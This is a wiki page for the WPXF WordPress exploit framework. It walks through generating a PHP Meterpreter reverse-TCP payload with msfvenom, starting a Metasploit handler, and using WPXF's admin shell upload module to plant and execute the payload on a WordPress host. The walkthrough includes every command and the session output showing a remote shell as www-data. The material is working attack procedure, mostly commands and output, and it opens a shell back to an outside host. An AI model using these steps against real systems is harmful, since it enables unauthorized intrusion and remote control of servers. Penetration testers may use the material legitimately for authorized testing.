Skip to content
This repository has been archived by the owner on Oct 22, 2020. It is now read-only.

Establishing a Meterpreter Session Using a Custom Payload

Jump to bottom
Rob edited this page May 6, 2018 · 3 revisions

New Meterpreter Payloads in v1.6.1

As of WPXF v1.6.1, this process (with the exception of setting up the handler in Metasploit) can be automated by instead using the meterpreter_reverse_tcp or meterpreter_bind_tcp payloads. Both payloads expose the basic options that would be used with msfvenom.

If you wish to use msfvenom manually, then continue reading.

Creating the Meterpreter payload

The first step we'll need to take is to create the payload that we'll use with the exploit. To do this, we'll use msfvenom which comes with Metasploit. In this example, we're going to use the php/meterpreter/reverse_tcp payload.

Run the following command, replacing the address specified with the address of the host machine you intend to run the reverse TCP handler on:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.213 -o meterpreter.php

This will generate and save the payload into a file called meterpreter.php in the current working directory.

Starting the handler in Metasploit

Metasploit contains a module which will let us just fire up a handler without running an exploit against any particular target. Start the handler by using the exploit/multi/handler module in Metasploit by using the below commands at an msf shell:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.213
LHOST => 192.168.1.213
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.213:4444 
[*] Starting the payload handler...

You'll notice, the LHOST option we set here matches the LHOST option we set when using msfvenom. Once the handler is running, we're ready to switch to WPXF to exploit the target.

Using WPXF to establish the Meterpreter session

For this example, we'll use the generic admin_shell_upload module. Load this module by using use exploit/shell/admin_shell_upload and set the options to point it at the target host.

Once all the required options have been set, load the custom payload and set the payload_path option to point at the meterpreter.php file we generated earlier using msfvenom:

wpxf [exploit/shell/admin_shell_upload] > set payload custom

  [+] Loaded payload: #<Wpxf::Payloads::Custom:0x456e490>

wpxf [exploit/shell/admin_shell_upload] > set payload_path D:\meterpreter.php

  [+] Set payload_path => D:\meterpreter.php

wpxf [exploit/shell/admin_shell_upload] >

Execute the module using the run command and we'll now see WPXF upload and execute the payload, and see the session establish in Metasploit:

WPXF output:

[-] Authenticating with WordPress using root:toor...
[-] Uploading payload...
[-] Executing the payload at
    http://192.168.1.15/wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php...
[+] Execution finished successfully

Metasploit output:

[*] Sending stage (33068 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.213:4444 -> 192.168.1.15:38899) at 2016-01-18 17:36:46 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64
Meterpreter : php/php

meterpreter > getuid
Server username: www-data (33)
meterpreter >
Clone this wiki locally